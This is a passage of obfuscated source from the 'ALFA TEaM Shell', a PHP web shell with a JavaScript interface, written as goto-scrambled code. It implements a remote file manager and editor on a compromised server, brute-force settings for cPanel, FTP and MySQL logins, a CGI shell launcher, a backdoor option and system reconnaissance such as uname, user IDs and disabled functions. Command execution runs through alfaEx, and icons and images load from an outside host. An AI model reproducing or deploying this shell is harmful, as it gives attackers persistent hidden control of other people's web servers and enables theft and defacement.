alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}\xd\xafunction saveByKey(event){\xd
	if(!(String.fromCharCode(event.which).toLowerCase() == 's' && event.ctrlKey) && !(event.which == 19))return true;\xd\xa\x9$("editor_edit_area").onsubmit();
\xa\x9event.preventDefault();\xd\xa\x9return false;
}\xd\xafunction setCookie(cname, cvalue, exdays){\xd
    var d = new Date();\xd
    d.setTime(d.getTime() + (exdays*24*60*60*1000));\xd\xa    var expires = "expires="+ d.toUTCString();\xd\xa    document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";\xd\xa}\xd
function getCookie(name){
  var value = "; " + document.cookie;
  var parts = value.split("; " + name + "=");
  if (parts.length == 2) return parts.pop().split(";").shift();
\xa}\xd
function editorClose(pos){
\x9d.body.style.overflow = "visible";\xd\xa	elem = $(pos);\xd\xa\x9elem.setAttribute("class", "editor-anim-close");
\xa	if(pos == "editor"){
		is_minimized = false;\xd\xa\x9}else{\xd
	\x9cgi_is_minimized = false;
\xa	}
\xa\x9setTimeout(function(){\xd\xa		elem.removeAttribute("class");\xd\xa	\x9elem.style.display = "none";\xd\xa	}, 1000);\xd
	d.body.style.overflow = "visible";
\xa}
function showEditor(pos){\xd\xa\x9$(pos).setAttribute("class", "editor-anim-show");
\xa\x9$(pos+"-minimized").setAttribute("class", "minimized-hide");\xd\xa	if(pos == "editor"){
\xa		is_minimized = false;
\x9\x9if(cgi_is_minimized){\xd
\x9	\x9$("cgiloader-minimized").style.top = "30%";
\xa\x9\x9}\xd
	}else{\xd
	\x9cgi_is_minimized = false;\xd
	\x9if(is_minimized){\xd
\x9		$("editor-minimized").style.top = "30%";
\xa	\x9}
\x9}\xd\xa	d.body.style.overflow = "hidden";
}\xd\xafunction editorMinimize(pos){
\xa\x9$(pos).setAttribute("class", "editor-anim-minimize");
\xa\x9$(pos+"-minimized").setAttribute("class", "minimized-show");\xd
\x9if(pos == "editor"){
\xa\x9\x9is_minimized = true;
\xa	\x9if(cgi_is_minimized){\xd
	\x9	$("cgiloader-minimized").style.top = "20%";
\xa		\x9$("editor-minimized").style.top = "50%";\xd\xa	\x9}else{\xd\xa\x9\x9\x9$("editor-minimized").style.top = "30%";
	\x9}\xd\xa\x9}else{
\x9\x9cgi_is_minimized = true;\xd\xa	\x9if(is_minimized){
\x9\x9\x9$("cgiloader-minimized").style.top = "20%";
\xa\x9		$("editor-minimized").style.top = "50%";\xd\xa\x9\x9}else{
\x9		$("cgiloader-minimized").style.top = "30%";
\x9\x9}\xd\xa\x9}
	d.body.style.overflow = "visible";
\xa}
\xafunction clearEditorHistory(){
\xa\x9var check = confirm("Are u Sure?");\xd
	if(check){
\x9	for(var i in editor_files){
\xa	\x9\x9if(i != editor_current_file){\xd
\x9\x9	\x9removeHistory(i);
\xa\x9	\x9}
	\x9}
\xa\x9}
}\xd\xafunction editor(file, mode, arg, pwd, file_id, type){
\xa	if(type=="dir"&&file=="..")return false;\xd\xa\x9if(mode == "download"){\xd\xa\x9	g("FilesTools",pwd,file,"download");
\x9	return false;\xd\xa\x9}\xd\xa\x9var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;\xd
\x9file = file.trim();
\xa	if(Object.keys(editor_files).length == 0){
\xa	\x9var cookie_file = getCookie("alfa_history_files");
\x9\x9try{\xd\xa			editor_files = JSON.parse(cookie_file);\xd
			for(var t in editor_files){\xd\xa\x9		\x9insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
\x9\x9\x9}\xd
\x9	}catch(e){}
\x9}\xd\xa	if(file.indexOf("/") != -1){
\xa\x9	var file_split = file.split("/");\xd
	\x9file = file_split[file_split.length - 1];\xd\xa\x9\x9delete file_split[file_split.length - 1];
\xa\x9	cwd = file_split.join("/");\xd\xa\x9\x9if(islinux){
\x9	\x9cwd = "/"+cwd;\xd\xa\x9	}
\x9}\xd\xa\x9if(typeof type == "undefined"){
\x9\x9type = "";
\xa\x9}
\xa	if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
\xa		cwd = pwd.trim();
\xa\x9}
\x9try{
\xa\x9\x9for(var i in editor_files){\xd\xa\x9	\x9if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
\xa				can_append = false;\xd
\x9\x9		file_id = i;
\x9\x9\x9\x9break;
	\x9	}
		}\xd
	}catch(e){\xd\xa	\x9console.log(e);
\x9}
\xa	editor_error = true;
\x9if(typeof arg != "undefined" && arg.length != 0 && arg != null){\xd
		param = alfab64(arg);
\xa\x9}\xd\xa\x9if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
	\x9fid = alfab64(file_id);
\xa\x9	pure_fid = file_id;\xd\xa	}else{
\xa\x9	var rand_fid = "file_" + getRandom(10);
\xa\x9\x9fid = alfab64(rand_fid);
\xa	\x9pure_fid = rand_fid;
\x9}
\xa	alfaloader("block");
\xa\x9_Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){\xd\xa\x9\x9document.querySelector(".editor-content").innerHTML = e;
\x9\x9$("editor").style.display  = "block";\xd\xa\x9\x9alfaloader("none");\xd\xa\x9	evalJS(e);
\xa\x9\x9if(mode != "delete" && editor_error){
\xa		\x9var active = d.getElementsByClassName("is_active");\xd
			if(active.length != 0){\xd
		\x9\x9active[0].className = "file-holder";
	\x9	}\xd
\x9		fid = pure_fid;
	\x9\x9file = decodeURIComponent(file);

\x9\x9	if(!editor_files[fid] && can_append){
\xa\x9\x9\x9\x9editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
\xa\x9\x9	\x9insertToHistory(fid, file, " is_active", type);\xd\xa\x9\x9		if(mode=="mkfile"){\xd\xa			\x9	g("FilesMan",null);\xd
		\x9\x9}
\xa\x9		}else{
\x9			$(fid).parentNode.className += " is_active";
\xa\x9		}\xd
	\x9}
		d.body.style.overflow = "hidden";
\x9\x9d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);\xd
\x9	if(editor_files[fid]){
		\x9d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");\xd
\x9	}
\xa\x9\x9editor_current_file = fid;\xd\xa\x9\x9if(is_minimized){
\xa\x9\x9	showEditor("editor");
\xa	\x9}
\xa	\x9updateCookieEditor();\xd
	});\xd\xa	return false;\xd\xa}\xd\xafunction insertToHistory(fid, file, mode, type){\xd\xa	var active = "";
	if(mode && mode != 0){
\x9\x9active = mode;
\x9}\xd\xa	var NewElement = document.createElement("div");
\xa	NewElement.innerHTML = "<div id='"+fid+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(file,type,fid)+"</div><div class='editor-file-name'>"+file+"</div></div><div class='history-close' onClick='removeHistory(\""+fid+"\");'>X</div>";\xd
\x9NewElement.className = "file-holder" + active;\xd\xa	NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});\xd\xa	NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});\xd\xa\x9var refNode = d.getElementsByClassName("history-list")[0];
\x9refNode.insertBefore(NewElement, refNode.firstChild);\xd\xa}\xd\xafunction loadType(file,type,id){
\x9if(type == "none"){
\xa\x9	_Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
\xa		\x9$(id).innerHTML = "<div class='editor-icon'>"+loadType(editor_files[id].file,e,id)+"</div><div class='editor-file-name'>"+editor_files[id].file+"</div>";
			editor_files[id].type = e;\xd\xa		});
	}\xd
	var img = '<img src="http://solevisible.com/icons/{type}" width="30" height="30">';
\xa	if(type == "file"){\xd\xa\x9\x9type = file.split(".");
\xa		type  = type[type.length - 1].toLowerCase();\xd
	\x9var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];\xd\xa	\x9if(types.indexOf(type) == -1){
	\x9	type = "notfound";\xd
\x9\x9}\xd
	}else{\xd\xa	\x9type = "folder";\xd
\x9}
	return img.replace("{type}",  type + ".png");\xd\xa}\xd
function updateDirsEditor(fid, fname){\xd
	var current_path = d.mf.c.value + "/";\xd\xa\x9var oldpath  = editor_files[fid].pwd + "/" + fname + "/";\xd
	var newpath  = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
\xa	oldpath = oldpath.replace(/\/\//g, "/");\xd\xa	newpath = newpath.replace(/\/\//g, "/");
\xa	current_path = current_path.replace(/\/\//g, "/");
\x9if(current_path.search(oldpath) != -1){
\x9\x9initDir(current_path.replace(oldpath, newpath));
\x9	d.mf.c.value = current_path.replace(oldpath, newpath);
	\x9_Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
\x9}
	for(var i in editor_files){
\xa\x9	var path = editor_files[i].pwd + "/";\xd\xa	\x9path = path.replace(/\/\//g, "/");
\xa		if(path.search(oldpath) != -1){\xd\xa\x9\x9\x9editor_files[i].pwd = path.replace(oldpath, newpath);
		}\xd\xa	}\xd
\x9var reg1 = new RegExp("'"+oldpath.slice(0, -1)+"'");
\x9var reg2 = new RegExp(fname + " \\|</b></a>");\xd\xa\x9d.files.innerHTML = d.files.innerHTML.replace(reg1, "'"+newpath.slice(0, -1)+"'");
\x9d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");\xd\xa	updateCookieEditor();\xd
}
function updateCookieEditor(){\xd\xa	setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
}
function setEditorTitle(fid, mode){\xd
\x9if(mode == "out" && editor_current_file != ""){\xd\xa\x9\x9fid = editor_current_file;\xd\xa	}\xd
	if(editor_files[fid]){
\xa\x9	d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");\xd\xa	}
\xa}
function removeHistory(el){
\xa	delete editor_files[el];
\xa	if($(el)){\xd
	\x9$(el).parentNode.parentNode.removeChild($(el).parentNode);
\xa	}
	var elm = d.getElementsByClassName("filestools")[0];\xd\xa\x9if(elm){\xd
		if(elm.getAttribute("fid") == el){\xd
	\x9\x9elm.outerHTML = "";
\xa\x9	}
\xa\x9}
	if(editor_current_file == el){
\xa	\x9editor_current_file = "";\xd\xa\x9}
\xa	updateCookieEditor();\xd
}\xd\xafunction getRandom(e){\xd
\x9for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
	return t
\xa}\xd
function reopen(el){\xd\xa	var file_id = el.getAttribute("id")
\x9var pwd = editor_files[file_id].pwd;
\xa\x9var filename = editor_files[file_id].file;
\x9editor(filename, "auto", "", pwd, file_id);\xd
}
\xafunction copyToClipboard(el){
\x9var node = document.getElementById(el);
	if(document.selection){\xd\xa	\x9var range = document.body.createTextRange();
		range.moveToElementText(document.getElementById(el));\xd
		range.select();
\xa	\x9document.execCommand("Copy");\xd
\x9\x9alert("text copied");
\xa\x9}else if (window.getSelection()){
\xa		var range = document.createRange();\xd
		range.selectNode(document.getElementById(el));
\xa		window.getSelection().removeAllRanges();
\xa\x9\x9window.getSelection().addRange(range);
	\x9document.execCommand("copy");
\x9\x9alert("text copied");\xd\xa\x9}
\xa}\xd\xafunction encrypt(str, pwd) {
\xa\x9if (pwd == null || pwd.length <= 0) {
\xa		return null;
\x9}\xd
\x9str = alfab64(str, true);\xd\xa	pwd = alfab64(pwd, true);
\xa\x9var enc_chr = "";
	var enc_str = "";
\xa	var i = 0;\xd\xa	while (i < str.length) {\xd\xa		for (var j = 0; j < pwd.length; j++) {\xd
	\x9\x9enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);\xd
\x9\x9	enc_str += String.fromCharCode(enc_chr);
			i++;
\xa\x9\x9\x9if (i >= str.length) break;\xd\xa\x9\x9}
	}\xd
	return alfab64(enc_str, true);
}\xd
function reloadSetting(e){
alfaloader("block");
\xa_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
\xaif(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);\xd
if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
\xareturn false\xd\xa}
function reloadColors(config){\xd
\x9var obj = {};\xd\xa	if(typeof config == "undefined"){
\xa	\x9d.querySelectorAll(".colors_input").forEach(function(e){\xd\xa\x9		var id = e.getAttribute("target").replace(".", "");
\xa\x9		obj[id] = e.value;\xd
\x9\x9});\xd\xa	}else{
\xa\x9	obj = config;
	}
\xa	alfaloader("block");
\xa\x9var checdk = ($("use_default_color").checked?"1":"0");\xd
	_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
\xa}\xd
function alfab64(a, normal){
\x9if(typeof normal != "undefined" || post_encryption_mode == false){
\xa		return window.btoa(unescape(encodeURIComponent(a)));
\xa	}\xd
\x9return encrypt(a, "" . _AlfaSecretKey() . "");
}\xd\xafunction evalCss(jcss){
\xa\x9var style = document.createElement("style");
\x9if (style.styleSheet) {
\xa\x9\x9style.styleSheet.cssText = jcss;\xd\xa	} else {\xd
\x9\x9style.appendChild(document.createTextNode(jcss));\xd
\x9}
\xa	d.getElementsByTagName("head")[0].appendChild(style);
}
function colorHandlerKey(el){
\x9setTimeout(function(e){
\xa\x9\x9colorHandler(el);\xd
	}, 200);
\xa}\xd
function colorHandler(el){
	var target = el.getAttribute("target");\xd
	var multi = el.getAttribute("multi");\xd\xa	var ishover = target.indexOf(":hover");\xd\xa\x9if(multi){\xd\xa\x9\x9var array = JSON.parse(atob(multi));\xd
\x9	var jcss = "";\xd\xa\x9	for(i in array.multi_selector){
		\x9jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
\xa\x9\x9}
\x9	evalCss(jcss);\xd\xa	}
\xa\x9if(ishover != -1 && !multi){
\xa\x9\x9$("input_" + target.replace(".","")).value = el.value;\xd\xa	\x9$("gui_" + target.replace(".","")).value = el.value;
\xa		var css = target+"{color: "+el.value+";}";
\xa\x9	evalCss(css);
	}else{
		$("input_" + target.replace(".","")).value = el.value;\xd
\x9\x9$("gui_" + target.replace(".","")).value = el.value;\xd
		if(target == ".header_values"){
	\x9\x9target = ".header,.header_values";\xd\xa\x9\x9}\xd
	\x9d.querySelectorAll(target).forEach(function(e){
\xa			e.style.color = el.value;\xd
	\x9});\xd
	}
}
function importConfig(event){
\xa\x9var input = event.target;\xd
    var reader = new FileReader();\xd\xa    reader.onload = function(){\xd
      var data = reader.result;
\xa\x9  try{\xd
\x9\x9  var conf = JSON.parse(data);
\x9\x9  reloadColors(conf);
\xa\x9  }catch(e){\xd
\x9\x9  alert("Config is invalid...!");\xd\xa\x9  }
\xa	  $("importFileBtn").value = "";
\xa    };
    reader.readAsText(input.files[0]);\xd\xa}\xd
function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
\xafunction path_history(pos){
\x9_Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
\xa}
\xafunction runcgi(lang){
\xa	if(cgi_is_minimized && cgi_lang == lang){\xd
\x9\x9showEditor("cgiloader");\xd\xa	\x9return false;
\x9}\xd\xa\x9_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
\x9	d.body.style.overflow = "hidden";
\xa		$("cgiloader").style.display = "block";\xd\xa\x9	$("cgiframe").innerHTML = e;\xd\xa		cgi_lang = lang;\xd\xa		if(cgi_is_minimized){
\xa\x9\x9\x9$("cgiloader-minimized").setAttribute("class", "minimized-hide");
\xa\x9	\x9setTimeout(function(){
\xa		\x9	$("cgiloader").removeAttribute("class");
\xa				if(is_minimized){\xd
\x9\x9	\x9	$("editor-minimized").style.top = "30%";
\x9\x9\x9\x9}\xd\xa	\x9\x9}, 1000);
\xa\x9	}
\xa	});\xd\xa}
\xa"; goto jIbx8; XwWGL: if (@ini_get("safe_mode_exec_dir")) { $safe_exe = @ini_get("safe_mode_exec_dir"); } else { $safe_exe = $none; } goto f2hOR; BI51H: if (function_exists("ssh2_connect")) { $ssh2 = $on; } else { $ssh2 = $of; } goto OfDsb; uXue8: $totalSpace = function_exists("disk_total_space") ? @disk_total_space($GLOBALS["cwd"]) : "?"; goto PSVac; lvPdx: if (@ini_get("open_basedir")) { $basedir_data = @ini_get("open_basedir"); if (strlen($basedir_data) > 120) { $open_b = substr($basedir_data, 0, 120) . "..."; } else { $open_b = $basedir_data; } } else { $open_b = $none; } goto XwWGL; fiSh2: for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } goto DzW9c; dJlzH: foreach ($li as $key => $value) { echo "<li><a href="javascript:void(0);" class="menu_options" onclick="g('" . $key . "',null,'','','');">" . $value . "</a></li>" . "
"; } goto mIR_1; RAODg: for ($j = 1; $j <= 10; $j++) { echo "if(alfa" . $j . "!=null)d.mf.alfa" . $j . ".value=alfa" . $j . ";else d.mf.alfa" . $j . ".value=alfa" . $j . "_;"; } goto W3i4l; ndQrV: if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } goto AFW2d; sDrFU: echo "<script type='text/javascript'>
var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';\xd
var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'
var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';\xd
var alfa1_ = '" . (strpos(@$_POST["alfa1"], "\xa") !== false ? '' : htmlspecialchars($_POST["alfa1"], ENT_QUOTES)) . "';
var alfa2_ = '" . (strpos(@$_POST["alfa2"], "
") !== false ? '' : htmlspecialchars($_POST["alfa2"], ENT_QUOTES)) . "';\xd\xavar alfa3_ = '" . (strpos(@$_POST["alfa3"], "\xa") !== false ? '' : htmlspecialchars($_POST["alfa3"], ENT_QUOTES)) . "';
var alfa4_ = '" . (strpos(@$_POST["alfa4"], "\xa") !== false ? '' : htmlspecialchars($_POST["alfa4"], ENT_QUOTES)) . "';
\xavar alfa5_ = '" . (strpos(@$_POST["alfa5"], "
") !== false ? '' : htmlspecialchars($_POST["alfa5"], ENT_QUOTES)) . "';\xd
var alfa6_ = '" . (strpos(@$_POST["alfa6"], "\xa") !== false ? '' : htmlspecialchars($_POST["alfa6"], ENT_QUOTES)) . "';
\xavar alfa7_ = '" . (strpos(@$_POST["alfa7"], "\xa") !== false ? '' : htmlspecialchars($_POST["alfa7"], ENT_QUOTES)) . "';
var alfa8_ = '" . (strpos(@$_POST["alfa8"], "\xa") !== false ? '' : htmlspecialchars($_POST["alfa8"], ENT_QUOTES)) . "';
\xavar alfa9_ = '" . (strpos(@$_POST["alfa9"], "
") !== false ? '' : htmlspecialchars($_POST["alfa9"], ENT_QUOTES)) . "';\xd
var alfa10_ = '" . (strpos(@$_POST["alfa10"], "
") !== false ? '' : htmlspecialchars($_POST["alfa10"], ENT_QUOTES)) . "';\xd\xavar d = document;\xd\xavar mysql_cache = {};\xd
var editor_files = {};\xd\xavar editor_error = true;
\xavar editor_current_file = '';
var is_minimized = false;\xd
var cgi_is_minimized = false;\xd\xavar cgi_lang = '';
var upcount = 1;\xd\xavar islinux = " . ($GLOBALS["sys"] != "win" ? "true" : "false") . ";\xd
var post_encryption_mode = " . (__ALFA_POST_ENCRYPTION__ ? "true" : "false") . ";\xd
function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
\xaif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;"; goto RAODg; LwZe2: echo "\xd\xa</head>\xd\xa<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">\xd\xa<div id="up_bar"></div>
\xa<div class="whole">\xd
<form method="post" name="mf" style="display:none;">
\xa<input type="hidden" name="a">
<input type="hidden" name="c" value="" . $GLOBALS["cwd"] . "">"; goto CdcgF; rs9SO: $quotes = function_exists("get_magic_quotes_gpc") ? get_magic_quotes_gpc() : "0"; goto tpERq; pz4If: $on = "<span class='header_on'> ON </span>"; goto IxBz6; f2hOR: if (@ini_get("safe_mode_include_dir")) { $safe_include = @ini_get("safe_mode_include_dir"); } else { $safe_include = $none; } goto VuLpz; PSVac: $totalSpace = $totalSpace ? $totalSpace : 1; goto pz4If; xqKge: $n = count($path); goto fiSh2; tEjGN: if (function_exists("oci_connect")) { $or = $on; } else { $or = $of; } goto PLcw7; jjji_: $cgi_shell = "<span class='header_off' id='header_cgishell'>OFF</span>"; goto lvPdx; wS9Bq: $none = "<span class='header_none'> NONE </span>"; goto BI51H; OfDsb: if (function_exists("curl_version")) { $curl = $on; } else { $curl = $of; } goto h9PUa; jIbx8: echo "</script>
\xa<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>\xd
<input type='hidden' name='a' value='dlfile'>\xd\xa<input type='hidden' name='c' value=''>\xd
<input type='hidden' name='file' value=''>
\xa</form>\xd
<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>\xd
<img id='a_loader' src='" . __showicon("loader") . "'>"; goto L5WD3; dg1Ne: $csscode = "	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;"; goto Ubph2; L5WD3: $cmd_uname = alfaEx("uname -a", false, false); goto E0upG; m83aA: if (function_exists("pg_connect")) { $pg = $on; } else { $pg = $of; } goto tEjGN; Wb3B7: $cwd_links = ''; goto ARL2M; NvI0j: echo "<input type="hidden" name="charset">\xd
</form>
\xa<div id='hidden_sh'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">" . __ALFA_VERSION__ . "</span></small></a></div>\xd\xa<div class="header"><table width="100%" border="0">
<tr>\xd\xa<td width="3%"><span class="header_vars">Uname:</span></td>\xd
<td colspan="2"><span class="header_values" id="header_uname">" . $uname . "</span></td>
</tr>
<tr>\xd\xa<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">" . $uid . " [ " . $user . " ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">" . $gid . " [ " . $group . " ]</span> </td>\xd
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
\xa</tr>\xd
<tr>\xd
<td><span class="header_vars">PHP:</span></td>
\xa<td><b>" . @phpversion() . " </b><span class="header_vars"> Safe Mode: " . $safe_modes . "</span></td>\xd\xa</tr>
\xa<tr>
\xa<td><span class="header_vars">ServerIP:</span></td>
<td><b>" . (!@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????" : @$_SERVER["SERVER_ADDR"]) . " <span class="header_vars">Your IP:</span><b> " . @$_SERVER["REMOTE_ADDR"] . "</b></td>
\xa</tr>\xd
<tr>\xd
<td width="3%"><span class="header_vars">DateTime:</span></td>
<td colspan="2"><b>" . date("Y-m-d H:i:s") . "</b></td>\xd\xa</tr>\xd\xa<tr>
\xa<td><span class="header_vars">Domains:</span></td>\xd\xa<td width="76%"><span class="header_values" id="header_domains">"; goto DaQxq; mRIkb: echo "<tr>\xd
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>" . Alfa_GetDisable_Function() . "</b></td>\xd
</tr>
\xa<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>" . $curl . " | <span class="header_vars">SSH2 : </span>" . $ssh2 . " | <span class="header_vars">Magic Quotes : </span>" . $magic . " | <span class="header_vars"> MySQL :</span>" . $mysql . " | <span class="header_vars">MSSQL :</span>" . $mssql . " | <span class="header_vars"> PostgreSQL :</span>" . $pg . " | <span class="header_vars"> Oracle :</span>" . $or . " " . ($GLOBALS["sys"] == "unix" ? "| <span class="header_vars"> CGI :</span> " . $cgi_shell : '') . "</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>\xd
</tr>
<tr>
\xa<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>" . $open_b . "</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>" . $safe_exe . "</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>" . $safe_include . "</b></td>
\xa</tr>
<tr>
<td height="11"><span class="header_vars">SoftWare: </span></td>\xd
<td colspan="2"><b>" . @getenv("SERVER_SOFTWARE") . "</b></td>
</tr>"; goto uYDwA; AFW2d: $freeSpace = function_exists("diskfreespace") ? @diskfreespace($GLOBALS["cwd"]) : "?"; goto uXue8; IxBz6: $of = "<span class='header_off'> OFF </span>"; goto wS9Bq; E0upG: $uname = function_exists("php_uname") ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : "( php_uname ) Function Disabled !"); goto myvs3; TvOfA: echo "</span></td>\xd
</tr>\xd\xa<tr>\xd
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>" . alfaSize($totalSpace) . " </b><span class="header_vars">Free:</span><b>" . alfaSize($freeSpace) . " [" . (int) ($freeSpace / $totalSpace * 100) . "%]</b></td>
\xa</tr>"; goto zsiHA; Ubph2: echo "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\xd\xa<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
\xa<link href="" . __showicon("alfamini") . "" rel="icon" type="image/x-icon"/>
\xa<title>..:: " . $_SERVER["HTTP_HOST"] . " ~ ALFA TEaM Shell - v" . __ALFA_VERSION__ . " ::..</title>\xd
<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">\xd
<style type="text/css">
.hlabale {
    color: #67ABDF;\xd
    border-radius: 4px;
\xa    border: 1px solid #27979B;\xd
    margin-left: 7px;
\xa    padding: 2px;\xd\xa}
#tbl_sympphp tr {
\x9text-align: center;\xd
}\xd
.editor-view {
\x9position: relative;\xd\xa}
\xa.view-content {
\x9position: absolute;\xd
	overflow-y: auto;
\xa	width: 100%;
	height: 475px;
}\xd
*::-webkit-scrollbar-track {\xd
	-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
	border-radius: 10px;
\x9background-color: #000115;
\xa}
\xa*::-webkit-scrollbar{\xd
	width: 10px;
\x9background-color: #000115;\xd
}
\xa*::-webkit-scrollbar-thumb {
	border-radius: 10px;
\xa\x9-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
\xa\x9background-color: rgb(30, 130, 181);
}\xd\xa.editor-file-name {
\xa\x9margin-left: 29px;
\x9margin-top: 4px;
